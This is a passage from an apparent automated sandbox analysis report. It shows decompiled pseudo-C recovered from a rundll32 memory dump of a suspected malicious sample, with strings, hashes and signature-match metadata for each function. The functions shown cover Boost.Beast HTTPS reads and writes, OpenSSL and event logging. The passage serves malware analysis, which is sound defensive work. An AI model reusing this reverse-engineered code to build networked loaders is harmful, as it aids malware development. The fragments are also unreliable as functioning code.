                                        				 *__rcx = 0x301;
                                        				goto 0x3882ba9b;
                                        				 *__rcx = 0;
                                        				__rcx[1] = 1;
                                        				goto 0x3882baa2;
                                        				 *__rcx = 0x109;
                                        				__rcx[1] = 2;
                                        				_t104 =  &(_t103[1]);
                                        				r8b = sil;
                                        				r11b = sil;
                                        				r9b = sil;
                                        				r10b = sil;
                                        				if ( *_t104 == 0) goto 0x3882bbe2;
                                        				_t49 =  *_t104 & 0x0000ffff;
                                        				_t72 = _t49 - 0x53;
                                        				if (_t72 > 0) goto 0x3882bb60;
                                        				if (_t72 == 0) goto 0x3882bb51;
                                        				if (_t72 == 0) goto 0x3882bbce;
                                        				if (_t72 == 0) goto 0x3882bb25;
                                        				if (_t72 == 0) goto 0x3882bb1d;
                                        				if (_t72 == 0) goto 0x3882bb0b;
                                        				_t54 = _t49 - _t65 - 0xffffffffffffffe8;
                                        				if (_t72 == 0) goto 0x3882bb02;
                                        				if (_t54 != 4) goto 0x3882bcbd;
                                        				if (r9b != 0) goto 0x3882bbc1;
                                        				 *__rcx =  *__rcx | 0x00000010;
                                        				goto 0x3882bb58;
                                        				asm("bts dword [edi], 0x7");
                                        				goto 0x3882bbcc;
                                        				if (( *__rcx & 0x00000040) != 0) goto 0x3882bbc1;
                                        				goto 0x3882bbca;
                                        				r10b = 1;
                                        				goto 0x3882bbc1;
                                        				if (r11b != 0) goto 0x3882bbc1;
                                        				_t32 =  *__rcx;
                                        				r11b = 1;
                                        				if ((_t32 & 0x00000002) != 0) goto 0x3882bbc1;
                                        				 *__rcx = _t32 & 0xfffffffe | 0x00000002;
                                        				__rcx[1] = __rcx[1] & 0xfffffffc | 0x00000004;
                                        				goto 0x3882bbcc;
                                        				_t78 = r9b;
                                        				if (_t78 != 0) goto 0x3882bbc1;
                                        				 *__rcx =  *__rcx | _t65;
                                        				r9b = 1;
                                        				goto 0x3882bbce;
                                        				if (_t78 == 0) goto 0x3882bbb9;
                                        				if (_t78 == 0) goto 0x3882bbaa;
                                        				if (_t78 == 0) goto 0x3882bb98;
                                        				if (_t78 == 0) goto 0x3882bb8c;
                                        				if (_t54 - 0x3a != 6) goto 0x3882bcbd;
                                        				if (( *__rcx & 0x0000c000) != 0) goto 0x3882bbc1;
                                        				asm("bts eax, 0xe");
                                        				goto 0x3882bbca;
                                        				if (r8b != 0) goto 0x3882bbc1;
                                        				asm("btr dword [edi+0x4], 0xb");
                                        				goto 0x3882bba2;
                                        				if (r8b != 0) goto 0x3882bbc1;
                                        				asm("bts dword [edi+0x4], 0xb");
                                        				r8b = 1;
                                        				goto 0x3882bbce;
                                        				_t83 =  *__rcx & 0x0000c000;
                                        				if (_t83 != 0) goto 0x3882bbc1;
                                        				asm("bts eax, 0xf");
                                        				goto 0x3882bbca;
                                        				asm("bt eax, 0xc");
                                        				if (_t83 >= 0) goto 0x3882bbc6;
                                        				goto 0x3882bbce;
                                        				asm("bts eax, 0xc");
                                        				if (1 != 0) goto 0x3882bab4;
                                        				if (r10b == 0) goto 0x3882bbeb;
                                        				_t106 =  &(( &(_t104[__rsi]))[1]);
                                        				if ( *_t106 == _t65) goto 0x3882bbe7;
                                        				if (r10b != 0) goto 0x3882bc07;
                                        				if ( *_t106 != 0) goto 0x3882bcbd;
                                        				__rcx[2] = 1;
                                        				goto 0x3882bccd;
                                        				r8d = 3;
                                        				if (E000001C31C33882D978(_t135) != 0) goto 0x3882bcbd;
                                        				goto 0x3882bc2e;
                                        				_t108 =  &(_t106[4]);
                                        				if ( *_t108 == _t65) goto 0x3882bc2a;
                                        				if ( *_t108 != 0x3d) goto 0x3882bcbd;
                                        				_t109 =  &(_t108[1]);
                                        				if ( *_t109 == _t65) goto 0x3882bc3d;
                                        				r8d = 5;
                                        				if (E000001C31C3388341D4(1, __rsi, _t109, _t135) != 0) goto 0x3882bc69;
                                        				_t110 =  &(_t109[5]);
                                        				asm("bts dword [edi], 0x12");
                                        				goto 0x3882bcb3;
                                        				r8d = 8;
                                        				if (E000001C31C3388341D4(1, __rsi, _t110, _t135) != 0) goto 0x3882bc8c;
                                        				_t111 =  &(_t110[8]);
                                        				asm("bts dword [edi], 0x11");
                                        				goto 0x3882bcb3;
                                        				r8d = 7;
                                        				if (E000001C31C3388341D4(1, __rsi, _t111, _t135) != 0) goto 0x3882bcbd;
                                        				asm("bts dword [edi], 0x10");
                                        				goto 0x3882bcb3;
                                        				if (_t111[8] == _t65) goto 0x3882bcaf;
                                        				goto 0x3882bbf5;
                                        				_t46 = E000001C31C338818984(__rsi);
                                        				 *__rsi = 0x16;
                                        				return E000001C31C338811BC8(_t46);
                                        			}
























                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: =$UTF-16LEUNICODE$UTF-8$ccs
                                        • API String ID: 3215553584-1047608489
                                        • Opcode ID: 96cf8fe9c0719356fadf82345b90979ccc2b9001b6df5a069cf9f7b1f1e7c23e
                                        • Instruction ID: 639ce0ca1d67d3a261ebeda59cf01756370270986401c0bc008a5a554fe52b22
                                        • Opcode Fuzzy Hash: 96cf8fe9c0719356fadf82345b90979ccc2b9001b6df5a069cf9f7b1f1e7c23e
                                        • Instruction Fuzzy Hash: FC81AEB2A82280C6FB64AF2DC651BEC27A0F721744F54E817CE324F688D764CB509743
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E000001C31C338700750(void* __rdx) {
                                        
                                        				if (__rdx != 0) goto 0x38700762;
                                        				return 0;
                                        			}




                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: vector<T> too long
                                        • API String ID: 0-3788999226
                                        • Opcode ID: 9332e477671ca40046f1949692a4c38fb21133f90a1ed4cfbdb399b7f6ad2eaa
                                        • Instruction ID: a8c0d28fa698e632b4ba7a975694a5e16b6a699849cd325dfcab5761f577a753
                                        • Opcode Fuzzy Hash: 9332e477671ca40046f1949692a4c38fb21133f90a1ed4cfbdb399b7f6ad2eaa
                                        • Instruction Fuzzy Hash: 1841CCB2751BC485EE14DB26D8087DE6261F354BB0F50A626EA7E477D5DB3CC2528300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 28%
                                        			E000001C31C3386F9E70(void* __rcx) {
                                        				char _v80;
                                        				char _v144;
                                        				char _v232;
                                        				long long _v240;
                                        				long long _v248;
                                        				char _v256;
                                        				char _v264;
                                        				char _v272;
                                        				char _v280;
                                        				void* __rbx;
                                        				void* _t40;
                                        				intOrPtr _t41;
                                        				void* _t44;
                                        				long long _t51;
                                        				void* _t56;
                                        				char* _t64;
                                        				void* _t76;
                                        				void* _t77;
                                        				void* _t78;
                                        				void* _t79;
                                        				void* _t80;
                                        
                                        				_v240 = 0xfffffffe;
                                        				_t56 = __rcx;
                                        				_t51 =  *((intOrPtr*)(__rcx + 0x70));
                                        				_v280 = 1;
                                        				_v272 = _t51;
                                        				_t41 =  *((intOrPtr*)(__rcx + 0x5c));
                                        				if (_t41 != 8) goto 0x386f9f59;
                                        				if (_t51 == 0) goto 0x386f9f5e;
                                        				_v264 = 0x3889d200;
                                        				_v256 = 0x3889d200;
                                        				_v248 = 0x3889d200;
                                        				_v280 = "invalid request body";
                                        				_v272 = 1;
                                        				E000001C31C33880E0E4(__rcx,  &_v280,  &_v256, _t76, _t77);
                                        				_v264 = 0x3889d240;
                                        				_v264 = 0x3889d258;
                                        				E000001C31C3387013E0(__rcx,  &_v144,  &_v264);
                                        				 *0x1C33889D280 = "void __cdecl boost::beast::http::message<1,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > >::prepare_payload(struct std::integral_constant<bool,1>)";
                                        				 *0x1C33889D288 = "D:\\Sources\\boost_1_68_0\\boost/beast/http/impl/message.ipp";
                                        				 *0x1C33889D290 = 0x172;
                                        				E000001C31C338703440(0x3889d258,  &_v80);
                                        				E000001C31C338703480(_t40, __rcx,  &_v232, 0x3889d258, _t77);
                                        				_t64 =  &_v232;
                                        				E000001C31C3388103EC(__rcx, _t64, 0x388e4690, _t77);
                                        				if (0x3889d258 != 0) goto 0x386f9f8b;
                                        				if ((_t64 - 0x00000004 & 0xfffffffc) != 0) goto 0x386f9f6d;
                                        				if (_t41 != 6) goto 0x386f9f8b;
                                        				E000001C31C338700B00(_t41, 0, _t44, 0x3889d258, _t56, _t78, _t79, _t80);
                                        				_v280 = 0;
                                        				E000001C31C338701170(_t40, _t44, 0x3889d258, _t56, _t56,  &_v280, _t77);
                                        				goto 0x386f9fa2;
                                        				E000001C31C338701170(_t40, _t44, 0x3889d258, _t56, _t56,  &_v280, _t77);
                                        				return E000001C31C338700B00(_t41, 0, _t44, 0x3889d258, _t56, _t78, _t79, _t80);
                                        			}

























                                        APIs
                                        Strings
                                        • D:\Sources\boost_1_68_0\boost/beast/http/impl/message.ipp, xrefs: 000001C3386F9F17
                                        • void __cdecl boost::beast::http::message<1,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > >::prepare_payload(struct std::integral_, xrefs: 000001C3386F9F0C
                                        • invalid request body, xrefs: 000001C3386F9EC0
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception__std_exception_copy$FileHeaderRaiseThrow
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/http/impl/message.ipp$invalid request body$void __cdecl boost::beast::http::message<1,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > >::prepare_payload(struct std::integral_
                                        • API String ID: 3608347590-2849356305
                                        • Opcode ID: 15a5388d6bc62080ccf0706142a58d9206a5d28c7ffa795efbdde216f47d1515
                                        • Instruction ID: 81b085eab3825bf6868513ac38d7f53e50fc15827fef9df28aa464fd599cdf19
                                        • Opcode Fuzzy Hash: 15a5388d6bc62080ccf0706142a58d9206a5d28c7ffa795efbdde216f47d1515
                                        • Instruction Fuzzy Hash: E5319271255BC091FA60DB14E880BDAB3A5F7C9354F50A227EAAD467A5EF7CC305C701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 50%
                                        			E000001C31C3386FA220(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, long long __r14) {
                                        				void* _t45;
                                        				void* _t46;
                                        				void* _t47;
                                        				long long _t50;
                                        				void* _t78;
                                        				void* _t80;
                                        				long long _t81;
                                        				void* _t82;
                                        				void* _t88;
                                        
                                        				_t50 = _t81;
                                        				_t80 = _t50 - 0x118;
                                        				_t82 = _t81 - 0x210;
                                        				 *((long long*)(_t80 - 0x78)) = 0xfffffffe;
                                        				 *((long long*)(_t50 + 8)) = __rbx;
                                        				 *((long long*)(_t50 + 0x10)) = __rsi;
                                        				 *((long long*)(_t50 + 0x18)) = __rdi;
                                        				 *((long long*)(_t50 + 0x20)) = __r14;
                                        				asm("movaps [eax-0x18], xmm6");
                                        				_t56 = __r8;
                                        				_t78 = __rcx;
                                        				r14d = 0;
                                        				 *((intOrPtr*)(_t82 + 0x20)) = r14d;
                                        				E000001C31C33880D880(__rcx, __rdx);
                                        				 *((long long*)(_t82 + 0x28)) = _t50;
                                        				E000001C31C3386FEDF0(_t47, __r8, _t78, __rdx, __rdx, __r8, _t82 + 0x20, _t88);
                                        				if ( *((intOrPtr*)(_t82 + 0x20)) == r14d) goto 0x386fa356;
                                        				asm("movaps xmm6, [esp+0x20]");
                                        				 *((long long*)(_t82 + 0x40)) = 0x3889d200;
                                        				 *((long long*)(_t82 + 0x48)) = 0x3889d200;
                                        				 *((long long*)(_t82 + 0x50)) = 0x3889d200;
                                        				 *((long long*)(_t82 + 0x30)) = 0x388b1da2;
                                        				 *((char*)(_t82 + 0x38)) = 1;
                                        				E000001C31C33880E0E4(__r8, _t82 + 0x30, _t82 + 0x48, __rdx, _t78);
                                        				 *((long long*)(_t82 + 0x40)) = 0x3889d2a0;
                                        				 *((long long*)(_t82 + 0x40)) = 0x388b1bc8;
                                        				asm("movups [esp+0x58], xmm6");
                                        				 *((long long*)(_t82 + 0x78)) = __r14;
                                        				 *((long long*)(_t80 - 0x80)) = __r14;
                                        				 *((long long*)(_t80 - 0x80)) = 0xf;
                                        				 *((long long*)(_t82 + 0x78)) = __r14;
                                        				 *((intOrPtr*)(_t82 + 0x68)) = r14b;
                                        				E000001C31C3386FDF30(0x388b1bc8, _t56, _t80 + 0x18);
                                        				 *0x1C3388B1C20 = "unsigned __int64 __cdecl boost::beast::http::read<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,class boost::beast::basic_flat_buffer<class std::allocator<char> >,false,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<char>>(class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> > &,class boost::beast::basic_flat_buffer<class std::allocator<char> > &,struct boost::beast::http::message<0,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > > &)";
                                        				 *0x1C3388B1C28 = "D:\\Sources\\boost_1_68_0\\boost/beast/http/impl/read.ipp";
                                        				 *0x1C3388B1C30 = 0x30d;
                                        				E000001C31C338703690(0x388b1bc8, _t80 + 0x88);
                                        				E000001C31C3386FDFB0(_t46, 0, _t56, _t80 - 0x70, 0x388b1bc8, _t78);
                                        				_t45 = E000001C31C3388103EC(_t56, _t80 - 0x70, 0x388e4e68, _t78);
                                        				asm("inc ecx");
                                        				return _t45;
                                        			}













                                        APIs
                                        Strings
                                        • unsigned __int64 __cdecl boost::beast::http::read<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,class boost::beast::basic_flat_buffer<class std::allocator<char> >,false,struct boost::beast::http::basic_stri, xrefs: 000001C3386FA30C
                                        • D:\Sources\boost_1_68_0\boost/beast/http/impl/read.ipp, xrefs: 000001C3386FA317
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception$FileHeaderInit_thread_footerRaiseThrow__std_exception_copy
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/http/impl/read.ipp$unsigned __int64 __cdecl boost::beast::http::read<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,class boost::beast::basic_flat_buffer<class std::allocator<char> >,false,struct boost::beast::http::basic_stri
                                        • API String ID: 4076867389-3379936717
                                        • Opcode ID: e5d03cb0b8856392f49a17fa8538f7ec0b1675ce6ee4384ff50d5c351f911d08
                                        • Instruction ID: c03d53a7c6a75a09eefc18981dd2eced8df2c12763b3b707e11d6949903dbc8f
                                        • Opcode Fuzzy Hash: e5d03cb0b8856392f49a17fa8538f7ec0b1675ce6ee4384ff50d5c351f911d08
                                        • Instruction Fuzzy Hash: 22318D32244F8096E710CF24E8806DEB7B8F794794F509226EBAC57BA9DF38C655C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 53%
                                        			E000001C31C3386FA0E0(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi) {
                                        				void* _t44;
                                        				long long _t48;
                                        				void* _t73;
                                        				long long _t75;
                                        				void* _t77;
                                        				long long _t78;
                                        				void* _t79;
                                        
                                        				_t75 = __rsi;
                                        				_t48 = _t78;
                                        				_t77 = _t48 - 0x108;
                                        				_t79 = _t78 - 0x200;
                                        				 *((long long*)(_t77 - 0x78)) = 0xfffffffe;
                                        				 *((long long*)(_t48 + 8)) = __rbx;
                                        				 *((long long*)(_t48 + 0x10)) = __rsi;
                                        				 *((long long*)(_t48 + 0x18)) = __rdi;
                                        				_t54 = __rdx;
                                        				_t73 = __rcx;
                                        				 *((intOrPtr*)(_t79 + 0x20)) = 0;
                                        				E000001C31C33880D880(__rcx, __rdx);
                                        				 *((long long*)(_t79 + 0x28)) = _t48;
                                        				E000001C31C3386FEC90(__rdx, _t73, __rdx, _t73, __rsi, _t79 + 0x20);
                                        				if ( *((intOrPtr*)(_t79 + 0x20)) == 0) goto 0x386fa205;
                                        				 *((long long*)(_t79 + 0x40)) = 0x3889d200;
                                        				 *((long long*)(_t79 + 0x48)) = 0x3889d200;
                                        				 *((long long*)(_t79 + 0x50)) = 0x3889d200;
                                        				 *((long long*)(_t79 + 0x30)) = 0x388b1da2;
                                        				 *((char*)(_t79 + 0x38)) = 1;
                                        				E000001C31C33880E0E4(_t54, _t79 + 0x30, _t79 + 0x48, _t73, _t75);
                                        				 *((long long*)(_t79 + 0x40)) = 0x3889d2a0;
                                        				 *((long long*)(_t79 + 0x40)) = 0x388b1bc8;
                                        				asm("movups xmm0, [esp+0x20]");
                                        				asm("movups [esp+0x58], xmm0");
                                        				 *((long long*)(_t79 + 0x78)) = _t75;
                                        				 *((long long*)(_t77 - 0x80)) = _t75;
                                        				 *((long long*)(_t77 - 0x80)) = 0xf;
                                        				 *((long long*)(_t79 + 0x78)) = _t75;
                                        				 *((intOrPtr*)(_t79 + 0x68)) = sil;
                                        				E000001C31C3386FDF30(0x388b1bc8, _t54, _t77 + 0x18);
                                        				 *0x1C3388B1C20 = "unsigned __int64 __cdecl boost::beast::http::write<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,true,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> >>(class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> > &,const struct boost::beast::http::message<1,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > > &)";
                                        				 *0x1C3388B1C28 = "D:\\Sources\\boost_1_68_0\\boost/beast/http/impl/write.ipp";
                                        				 *0x1C3388B1C30 = 0x323;
                                        				E000001C31C338703690(0x388b1bc8, _t77 + 0x88);
                                        				E000001C31C3386FDFB0(_t44, 0, _t54, _t77 - 0x70, 0x388b1bc8, _t75);
                                        				return E000001C31C3388103EC(_t54, _t77 - 0x70, 0x388e4e68, _t75);
                                        			}











                                        APIs
                                        Strings
                                        • unsigned __int64 __cdecl boost::beast::http::write<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,true,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<cha, xrefs: 000001C3386FA1BB
                                        • D:\Sources\boost_1_68_0\boost/beast/http/impl/write.ipp, xrefs: 000001C3386FA1C6
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception$FileHeaderInit_thread_footerRaiseThrow__std_exception_copy
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/http/impl/write.ipp$unsigned __int64 __cdecl boost::beast::http::write<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,true,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<cha
                                        • API String ID: 4076867389-3407313142
                                        • Opcode ID: 390820797747de22af92d93a00ddc41198c1fceb6aa38a6f7fbf486f83de749d
                                        • Instruction ID: 60205626dcc4f760cecc37f86fc272b2904076b445dd067ab7dacfdaeb5d7c6d
                                        • Opcode Fuzzy Hash: 390820797747de22af92d93a00ddc41198c1fceb6aa38a6f7fbf486f83de749d
                                        • Instruction Fuzzy Hash: 97315C32644B8096F710DB54E8407CEB7B8F784784F509227EAAC47BA9DF38C645CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CertCertificateContextProperty
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$capi_cert_get_fname
                                        • API String ID: 665277682-2690582526
                                        • Opcode ID: 79b2cb2b5d6dc7e9a1b933f7a63a3defb7ecdf2f284955527ea9f3f5d724cd80
                                        • Instruction ID: c92f649bad1561a4d3b52587b47f58f34c1b34551b31178ad1665937fc610f86
                                        • Opcode Fuzzy Hash: 79b2cb2b5d6dc7e9a1b933f7a63a3defb7ecdf2f284955527ea9f3f5d724cd80
                                        • Instruction Fuzzy Hash: 1F2174763906C042F740DB21E805FDA63A2BB457C0F44E023DD294B795EB6DC755CB42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 29%
                                        			E000001C31C33872A45F(void* __eax, signed int __ebx, signed int __ecx, void* __edx, short __esi, signed int* __rax, void* __rbx, intOrPtr* __rdx, void* __rdi, long long __rsi, void* __r8) {
                                        				int _t23;
                                        				void* _t31;
                                        				void* _t33;
                                        				signed int* _t38;
                                        				long long _t57;
                                        				long long _t59;
                                        				void* _t61;
                                        
                                        				_t57 = __rsi;
                                        				_t38 = __rax;
                                        				asm("adc ch, bl");
                                        				asm("adc [esi+0x44], ah");
                                        				 *__rdx = __ebx;
                                        				goto 0x3872a472;
                                        				 *__rdx = r14w;
                                        				 *__rdx = r15d;
                                        				if (__r8 + 1 - __rbx < 0) goto 0x3872a418;
                                        				E000001C31C33871E120(__eax + 0x66);
                                        				 *((long long*)(_t61 + 0x28)) = _t59 + 0x268;
                                        				 *((long long*)(_t61 + 0x20)) = __rsi;
                                        				r8d = 0xff;
                                        				E000001C31C338816CC0(__ebx, __ecx ^ __ebx, __edx, _t31, _t33, _t59 + 0x268,  *_t38 | 0x00000001, _t59 + 0x10, __rsi, __r8 + 1, __rdi);
                                        				 *((short*)(_t59 + 0x20e)) = __esi;
                                        				if (E000001C31C33872A110(_t38, _t59 + 0x268, __rdi, __rdi) <= 0) goto 0x3872a515;
                                        				RegisterEventSourceW(??, ??);
                                        				if (_t38 == 0) goto 0x3872a52c;
                                        				 *((long long*)(_t61 + 0x40)) = _t57;
                                        				 *_t59 = _t59 + 0x10;
                                        				 *((long long*)(_t61 + 0x38)) = _t59;
                                        				r8d = 0;
                                        				 *((intOrPtr*)(_t61 + 0x30)) = __esi;
                                        				r9d = 0;
                                        				 *((short*)(_t61 + 0x28)) = 1;
                                        				 *((long long*)(_t61 + 0x20)) = _t57;
                                        				ReportEventW(??, ??, ??, ??, ??, ??, ??, ??, ??);
                                        				DeregisterEventSource(??);
                                        				goto 0x3872a52c;
                                        				r9d = 0x10;
                                        				_t23 = MessageBoxW(??, ??, ??, ??);
                                        				E000001C31C33880C290();
                                        				return _t23;
                                        			}











                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Event$InformationObjectSourceUser$AddressDeregisterErrorHandleLastMessageModuleProcProcessRegisterReportStationWindow_invalid_parameter_noinfowcsstr
                                        • String ID: OpenSSL
                                        • API String ID: 1804357490-773864679
                                        • Opcode ID: 86ec71efb7cfdb46ea702f6dd2606ec8eb9623775bbf656fafa1927dea9f0af4
                                        • Instruction ID: 9f8a787f1a1e2ffc02524320678a3514bedaefa39c68c61d3d3677638774c5aa
                                        • Opcode Fuzzy Hash: 86ec71efb7cfdb46ea702f6dd2606ec8eb9623775bbf656fafa1927dea9f0af4
                                        • Instruction Fuzzy Hash: 4611AC33285BC086F760CF24F8146DA7365F744788F54A52AAE9A0BB56DF38C385C701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E000001C31C33872A46B(void* __eax, signed int __ebx, signed int __ecx, void* __edx, short __esi, signed int* __rax, void* __rbx, intOrPtr* __rdx, void* __rdi, long long __rsi, void* __r8) {
                                        				int _t23;
                                        				void* _t31;
                                        				void* _t33;
                                        				signed int* _t38;
                                        				long long _t57;
                                        				long long _t59;
                                        				void* _t61;
                                        
                                        				_t57 = __rsi;
                                        				_t38 = __rax;
                                        				 *__rdx = r15d;
                                        				if (__r8 + 1 - __rbx < 0) goto 0x3872a418;
                                        				E000001C31C33871E120(__eax + 0x66);
                                        				 *((long long*)(_t61 + 0x28)) = _t59 + 0x268;
                                        				 *((long long*)(_t61 + 0x20)) = __rsi;
                                        				r8d = 0xff;
                                        				E000001C31C338816CC0(__ebx, __ecx ^ __ebx, __edx, _t31, _t33, _t59 + 0x268,  *_t38 | 0x00000001, _t59 + 0x10, __rsi, __r8 + 1, __rdi);
                                        				 *((short*)(_t59 + 0x20e)) = __esi;
                                        				if (E000001C31C33872A110(_t38, _t59 + 0x268, __rdi, __rdi) <= 0) goto 0x3872a515;
                                        				RegisterEventSourceW(??, ??);
                                        				if (_t38 == 0) goto 0x3872a52c;
                                        				 *((long long*)(_t61 + 0x40)) = _t57;
                                        				 *_t59 = _t59 + 0x10;
                                        				 *((long long*)(_t61 + 0x38)) = _t59;
                                        				r8d = 0;
                                        				 *((intOrPtr*)(_t61 + 0x30)) = __esi;
                                        				r9d = 0;
                                        				 *((short*)(_t61 + 0x28)) = 1;
                                        				 *((long long*)(_t61 + 0x20)) = _t57;
                                        				ReportEventW(??, ??, ??, ??, ??, ??, ??, ??, ??);
                                        				DeregisterEventSource(??);
                                        				goto 0x3872a52c;
                                        				r9d = 0x10;
                                        				_t23 = MessageBoxW(??, ??, ??, ??);
                                        				E000001C31C33880C290();
                                        				return _t23;
                                        			}










                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Event$InformationObjectSourceUser$AddressDeregisterErrorHandleLastMessageModuleProcProcessRegisterReportStationWindow_invalid_parameter_noinfowcsstr
                                        • String ID: OpenSSL
                                        • API String ID: 1804357490-773864679
                                        • Opcode ID: 26c6716afbaf5caacc0329c87e0c4a82709509a95590302a30f5eef5bf49bed6
                                        • Instruction ID: f41c3bb693da8f8afa0bd2b909137c2c318ed18d4792aa9e0b61bab7331aef3c
                                        • Opcode Fuzzy Hash: 26c6716afbaf5caacc0329c87e0c4a82709509a95590302a30f5eef5bf49bed6
                                        • Instruction Fuzzy Hash: 88119A33281BC086FB609F24F8546DA7365F744798F40A52AAE5A4BB56DF38C395C701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: CoSetProxyBlanket$ole32.dll
                                        • API String ID: 1646373207-1829017490
                                        • Opcode ID: ab3a54a3bf3aca8defbc1a656ff67811e1a416d1a790af5c09cc7e4d7e90e107
                                        • Instruction ID: 468dd1d9ca81f6f55d0b3042679540b926fae8aa491fc1459529a6bb7e2d8a85
                                        • Opcode Fuzzy Hash: ab3a54a3bf3aca8defbc1a656ff67811e1a416d1a790af5c09cc7e4d7e90e107
                                        • Instruction Fuzzy Hash: 08018432245B8085FB52CF54E454B997361F7D8B98F049522CE6E87B60DF38C285C701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 92%
                                        			E000001C31C338821BA4(signed int __edx, void* __edi, void* __esp, intOrPtr* __rax, long long __rbx, signed int* __rcx, void* __rdx, long long __rsi, void* __r8, long long _a8, long long _a24, signed short _a32, intOrPtr _a40) {
                                        				void* _v8;
                                        				char _v16;
                                        				intOrPtr* _v32;
                                        				char _v40;
                                        				void* __rdi;
                                        				void* _t17;
                                        				intOrPtr* _t43;
                                        				void* _t55;
                                        
                                        				_a8 = __rbx;
                                        				_a24 = __rsi;
                                        				_a32 = r9w;
